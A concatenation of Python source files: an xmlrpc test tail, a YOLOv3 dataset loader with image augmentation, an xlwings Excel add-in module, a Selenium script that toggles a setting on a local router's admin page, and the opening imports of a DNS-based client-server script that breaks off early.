pass #gzip not supported in this build
xmlrpc_tests.append(MultiPathServerTestCase)
xmlrpc_tests.append(ServerProxyTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
datasets.py | import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif']
vid_formats = ['.mov', '.avi', '.mp4']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416, half=False):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
self.half = half # half precision fp16 images
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in ' + path
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img, *_ = letterbox(img0, new_shape=self.img_size)
# Normalize RGB
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416, half=False):
self.img_size = img_size
self.half = half # half precision fp16 images
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img, *_ = letterbox(img0, new_shape=self.img_size)
# Normalize RGB
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416, half=False):
self.mode = 'images'
self.img_size = img_size
self.half = half # half precision fp16 images
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, interp=cv2.INTER_LINEAR)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Normalize RGB
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=True, image_weights=False,
cache_labels=False, cache_images=False):
path = str(Path(path)) # os-agnostic
with open(path, 'r') as f:
self.img_files = [x.replace('/', os.sep) for x in f.read().splitlines() # os-agnostic
if os.path.splitext(x)[-1].lower() in img_formats]
n = len(self.img_files)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
assert n > 0, 'No images found in %s' % path
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes
sp = 'data' + os.sep + path.replace('.txt', '.shapes').split(os.sep)[-1] # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
i = ar.argsort()
self.img_files = [self.img_files[i] for i in i]
self.label_files = [self.label_files[i] for i in i]
self.shapes = s[i]
ar = ar[i]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / 32.).astype(np.int) * 32
# Preload labels (required for weighted CE training)
self.imgs = [None] * n
self.labels = [None] * n
if cache_labels or image_weights: # cache labels for faster training
self.labels = [np.zeros((0, 5))] * n
extract_bounding_boxes = False
create_datasubset = False
pbar = tqdm(self.label_files, desc='Reading labels')
nm, nf, ne, ns = 0, 0, 0, 0 # number missing, number found, number empty, number datasubset
for i, file in enumerate(pbar):
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w, _ = img.shape
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
box = xywh2xyxy(x[1:].reshape(-1, 4) * np.array([1, 1, 1.5, 1.5])).ravel()
b = np.clip(box, 0, 1) # clip boxes outside of image
ret_val = cv2.imwrite(f, img[int(b[1] * h):int(b[3] * h), int(b[0] * w):int(b[2] * w)])
assert ret_val, 'Failure extracting classifier boxes'
else:
ne += 1 # file empty
pbar.desc = 'Reading labels (%g found, %g missing, %g empty for %g images)' % (nf, nm, ne, n)
assert nf > 0, 'No labels found. Recommend correcting image and label paths.'
# Cache images into memory for faster training (~5GB)
if cache_images and augment: # if training
for i in tqdm(range(min(len(self.img_files), 10000)), desc='Reading images'): # max 10k images
img_path = self.img_files[i]
img = cv2.imread(img_path) # BGR
assert img is not None, 'Image Not Found ' + img_path
r = self.img_size / max(img.shape) # size ratio
if self.augment and r < 1: # if training (NOT testing), downsize to inference shape
h, w, _ = img.shape
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_LINEAR) # or INTER_AREA
self.imgs[i] = img
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
img_path = self.img_files[index]
label_path = self.label_files[index]
hyp = self.hyp
# Load image
img = self.imgs[index]
if img is None:
img = cv2.imread(img_path) # BGR
assert img is not None, 'Image Not Found ' + img_path
r = self.img_size / max(img.shape) # size ratio
if self.augment and r < 1: # if training (NOT testing), downsize to inference shape
h, w, _ = img.shape
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_LINEAR) # INTER_LINEAR fastest
# Augment colorspace
augment_hsv = True
if self.augment and augment_hsv:
# SV augmentation by 50%
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # hue, sat, val
S = img_hsv[:, :, 1].astype(np.float32) # saturation
V = img_hsv[:, :, 2].astype(np.float32) # value
a = random.uniform(-1, 1) * hyp['hsv_s'] + 1
b = random.uniform(-1, 1) * hyp['hsv_v'] + 1
S *= a
V *= b
img_hsv[:, :, 1] = S if a < 1 else S.clip(None, 255)
img_hsv[:, :, 2] = V if b < 1 else V.clip(None, 255)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img)
# Letterbox
h, w, _ = img.shape
if self.rect:
shape = self.batch_shapes[self.batch[index]]
img, ratiow, ratioh, padw, padh = letterbox(img, new_shape=shape, mode='rect')
else:
shape = self.img_size
img, ratiow, ratioh, padw, padh = letterbox(img, new_shape=shape, mode='square')
# Load labels
labels = []
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratiow * w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = ratioh * h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = ratiow * w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = ratioh * h * (x[:, 2] + x[:, 4] / 2) + padh
# Augment image and labels
if self.augment:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Cutout
if random.random() < 0.9:
labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Normalize
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img, dtype=np.float32) # uint8 to float32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return torch.from_numpy(img), labels_out, img_path, (h, w)
@staticmethod
def collate_fn(batch):
img, label, path, hw = list(zip(*batch)) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, hw
def letterbox(img, new_shape=416, color=(128, 128, 128), mode='auto', interp=cv2.INTER_AREA):
# Resize a rectangular image to a 32 pixel multiple rectangle
# https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
ratio = float(new_shape) / max(shape)
else:
ratio = max(new_shape) / max(shape) # ratio = new / old
ratiow, ratioh = ratio, ratio
new_unpad = (int(round(shape[1] * ratio)), int(round(shape[0] * ratio)))
# Compute padding https://github.com/ultralytics/yolov3/issues/232
if mode is 'auto': # minimum rectangle
dw = np.mod(new_shape - new_unpad[0], 32) / 2 # width padding
dh = np.mod(new_shape - new_unpad[1], 32) / 2 # height padding
elif mode is 'square': # square
dw = (new_shape - new_unpad[0]) / 2 # width padding
dh = (new_shape - new_unpad[1]) / 2 # height padding
elif mode is 'rect': # square
dw = (new_shape[1] - new_unpad[0]) / 2 # width padding
dh = (new_shape[0] - new_unpad[1]) / 2 # height padding
elif mode is 'scaleFill':
dw, dh = 0.0, 0.0
new_unpad = (new_shape, new_shape)
ratiow, ratioh = new_shape / shape[1], new_shape / shape[0]
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=interp) # INTER_AREA is better, INTER_LINEAR is faster
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratiow, ratioh, dw, dh
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
if targets is None:
targets = []
border = 0 # width of added border (optional)
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
M = S @ T @ R # Combined rotation matrix. ORDER IS IMPORTANT HERE!!
imw = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_AREA,
borderValue=(128, 128, 128)) # BGR order borderValue
# Return warped points also
if len(targets) > 0:
n = targets.shape[0]
points = targets[:, 1:5].copy()
area0 = (points[:, 2] - points[:, 0]) * (points[:, 3] - points[:, 1])
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = points[:, [0, 1, 2, 3, 0, 3, 2, 1]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16))
i = (w > 4) & (h > 4) & (area / (area0 + 1e-16) > 0.1) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return imw, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2, x1y1x2y2=True):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 # + [0.25] * 4 + [0.125] * 16 + [0.0625] * 64 + [0.03125] * 256 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
mask_color = [random.randint(0, 255) for _ in range(3)]
image[ymin:ymax, xmin:xmax] = mask_color
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.90] # remove >90% obscured labels
return labels
def convert_images2bmp():
# cv2.imread() jpg at 230 img/s, *.bmp at 400 img/s
for path in ['../coco/images/val2014/', '../coco/images/train2014/']:
folder = os.sep + Path(path).name
output = path.replace(folder, folder + 'bmp')
if os.path.exists(output):
shutil.rmtree(output) # delete output folder
os.makedirs(output) # make new output folder
for f in tqdm(glob.glob('%s*.jpg' % path)):
save_name = f.replace('.jpg', '.bmp').replace(folder, folder + 'bmp')
cv2.imwrite(save_name, cv2.imread(f))
for label_path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
with open(label_path, 'r') as file:
lines = file.read()
lines = lines.replace('2014/', '2014bmp/').replace('.jpg', '.bmp').replace(
'/Users/glennjocher/PycharmProjects/', '../')
with open(label_path.replace('5k', '5k_bmp'), 'w') as file:
file.write(lines)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
__init__.py | # AIcells (https://github.com/aicells/aicells) - Copyright 2020 Gergely Szerovay, László Siller
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import yaml
import os
import pandas
import xlwings
import multiprocessing
import time
from . import UDFUtils
from . import AICFactory
from . import AICException
aicConfig = {}
globalProcess = None
globalQueue = None
def RunUDFProcessWrapper(args, timeStart, q=None):
result = RunUDF(args, q)
print(timeStart)
print(time.time())
diff = time.time() - timeStart
q.put(['debug', f"Python function run time (wo. data transfer): {diff:.2f}s"])
q.put(['result', result])
def RunUDF(args, q=None):
# [0] - udf name
# [1] - udf parameters
# [2] - namespace list
# [3-] - ranges
global globalOutputRange
args = list(args) # tuple to list
# build a dictionary from the ranges, the keys are the names in the namespace
rangeDict = {}
for i in range(0, 10):
if not (args[2][i] is None):
idx0 = i + 3
# single value passed, convert to 2d
if (not isinstance(args[idx0], list)):
args[idx0] = [[args[idx0]]]
else:
# single 1d row passed, convert to 2d
if (not isinstance(args[idx0][0], list)):
args[idx0] = [args[idx0]]
# replace empty strings with None
for idx1, v1 in enumerate(args[idx0]):
for idx2, v2 in enumerate(v1):
if isinstance(v2, str):
if v2 == "":
args[idx0][idx1][idx2] = None
rangeDict[args[2][i]] = args[idx0]
# merge the udf arguments into the base namespace
try:
if not ("parameters" in rangeDict):
rangeDict['parameters'] = []
if len(rangeDict['parameters']) == 2:
if len(rangeDict['parameters'][0]) != 2:
# vertical parameter table => transpose it
rangeDict['parameters'] = UDFUtils.Transpose2DList(rangeDict['parameters'])
if isinstance(args[1], list):
if len(args[1]) > 0:
if (len(args[1]) == 2) and (not isinstance(args[1][0], list)):
args[1] = [args[1]]
for i in range(0, len(args[1])):
# parameters range should have exactly 2 columns
if len(args[1][i]) != 2:
raise AICException.AICEParameterError("PARAMETER_ERROR", {"parameterName": "parameters"})
key = args[1][i][0]
value = args[1][i][1]
match = False
for j in range(0, len(rangeDict['parameters'])):
if key == rangeDict['parameters'][j][0]:
match = True
if value == '@AICELLS-RANGE@':
rangeDict['parameters'][j][1] = value
elif not (value is None):
# if (not (rangeDict['parameters'][j][1] is None)) and (rangeDict['parameters'][j][1] != ""):
if not (rangeDict['parameters'][j][1] is None):
raise AICException.AICEParameterError("PARAMETER_COLLISION", {"parameterName": key})
rangeDict['parameters'][j][1] = value
if not match:
rangeDict['parameters'].append([key, value])
except AICException.AICEParameterError as e:
return AICException.AICErrorToExcelRange(e.GetErrorList())
dataSourceClass = None
try:
c = factory.CreateInstance("function-class." + args[0])
c.SetQueue(q)
c.SetConfig(aicConfig)
except Exception as e:
e = AICException.AICException("UNKNOWN_FUNCTION")
return AICException.AICErrorToExcelRange(e.GetErrorList())
if 'parameters.output' in rangeDict:
try:
dataSourceClass = c.GetDataSourceClass(rangeDict['parameters.output'])
except Exception as e:
pass
try:
result = c.Run(rangeDict)
except AICException.AICException as e:
return AICException.AICErrorToExcelRange(e.GetErrorList())
if 'svg' in c.GetTag():
return [['#AICELLS-SVG!'] + result]
if dataSourceClass is None:
return result
else:
try:
try:
dataSource = factory.CreateInstance('tool-class.' + dataSourceClass.replace('.', '_'))
except Exception as e:
raise AICException.AICEParameterError("DATA_SOURCE_UNKNOWN", {"data_source": 'data_source'})
dataSourceArguments = dataSource.ProcessArguments(rangeDict, 'parameters.output')
try:
header = False
if 'header' in dataSourceArguments:
if dataSourceArguments['header']:
header = True
if header:
columns = result[0]
if not isinstance(columns, list): # single column
columns = [columns]
df = pandas.DataFrame(result[1:], columns=columns)
else:
df = pandas.DataFrame(result)
fn = dataSource.Write(df, c.workbookPath, dataSourceArguments, 'output')
return fn # 'Output saved: '
except AICException.AICException as e:
raise
# raise AICException.AICException("DATA_SOURCE_ERROR", {"parameterName": 'data_source'})
except AICException.AICException as e:
return AICException.AICErrorToExcelRange(e.GetErrorList())
except Exception as e:
errorMessage = ""
if len(e.args) > 0:
errorMessage = e.args[0]
e2 = AICException.AICException("FATAL_ERROR", {"error": errorMessage})
return AICException.AICErrorToExcelRange(e2.GetErrorList())
@xlwings.func
def aicUDFRunner(*args):
# [0] - udf name
# [1] - udf parameters
# [2] - namespace list
# [3-] - ranges
sys.stderr.write("Call from VBA UDF " + args[0] + ":\n")
return RunUDF(args)
@xlwings.func
def aicProcessRunner(*args):
# [0] - udf name
# [1] - udf parameters
# [2] - namespace list
# [3-] - ranges
global globalProcess, globalQueue
sys.stderr.write("Call from VBA Runner tool " + args[0] + ":\n")
if not (globalProcess is None):
return 'ERROR'
globalQueue = multiprocessing.Queue()
globalProcess = multiprocessing.Process(target=RunUDFProcessWrapper, args=(args, time.time(), globalQueue))
globalProcess.start()
return 'OK'
@xlwings.func
def aicQueueGet(*args):
global globalProcess, globalQueue
if globalProcess is None:
return ['empty', 'empty']
if not (globalQueue is None):
if not globalQueue.empty():
queueItem = globalQueue.get()
if queueItem[0] == 'result':
globalProcess = None
globalQueue = None
return queueItem
else:
return ['empty', 'empty']
@xlwings.func
def aicAbortProcess(*args):
global globalProcess, globalQueue
sys.stderr.write("Call from VBA Dialog Runner: aicAbortProcess\n")
if not (globalProcess is None):
if globalProcess.is_alive():
globalProcess.terminate()
globalProcess = None
globalQueue = None
print('Loading aicells-config.yml ...')
dir = os.path.dirname(os.path.realpath(__file__))
yamlFile = dir + '\\..\\..\\..\\..\\aicells-config.yml'
with open(yamlFile) as file:
aicConfig = yaml.load(file, Loader=yaml.FullLoader)
factory = AICFactory.AICFactory(aicConfig)
|
PortDisconnector.py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from xvfbwrapper import Xvfb
from selenium.common.exceptions import NoSuchElementException
import threading
password = 'Put password here'
valueList = ['1048614','38','1048611','35','32']
phantomjs_path = 'C:/Python27/Scripts/phantomjs.exe'
index = 0
xpath = '//*[@id="pagepost"]/table[1]/tbody/tr[2]/td[2]/select'
#browser = webdriver.Firefox()
browser = webdriver.PhantomJS(phantomjs_path)
browser.set_window_size(1400, 1000)
browser.get('http://192.168.1.254/xslt?PAGE=C_2_2')
def worker():
inputStr = ''
inputStr = raw_input("Type 'q' to quit\n")
while inputStr != 'q':
inputStr = raw_input("Type 'q' to quit\n")
return
t = threading.Thread(target=worker)
t.start()
while t.isAlive():
try:
element = browser.find_element_by_name('ADM_PASSWORD')
element.clear()
element.send_keys(password)
element.submit()
except NoSuchElementException:
element = browser.find_element_by_xpath(xpath)
select = Select(element)
if index > (len(valueList) - 1):
index = 0
select.select_by_value(valueList[index])
index += 1
element.submit()
try:
element = browser.find_element_by_name('ADM_PASSWORD')
element.clear()
element.send_keys(password)
element.submit()
element = browser.find_element_by_xpath(xpath)
select = Select(element)
select.select_by_value('32')
element.submit()
except NoSuchElementException:
element = browser.find_element_by_xpath(xpath)
select = Select(element)
select.select_by_value('32')
element.submit()
browser.close()
|
server.py | import datetime
import re
import signal
import sys
import threading
import zlib
from arc4 import ARC4
from argparse import ArgumentParser
from typing import Any, Dict
from dnslib import *
from shared import client_to_serv, serv_to_client, get_request_name
class Command:
def __init__(self, addr):
self.addr = addr
self.completed = True
""" Whether this command has been completed """
self.started = False
""" Whether the client knows we want this command to be executed. Waiting for reply """
self.arg = []
self.segments = []
self.command = None
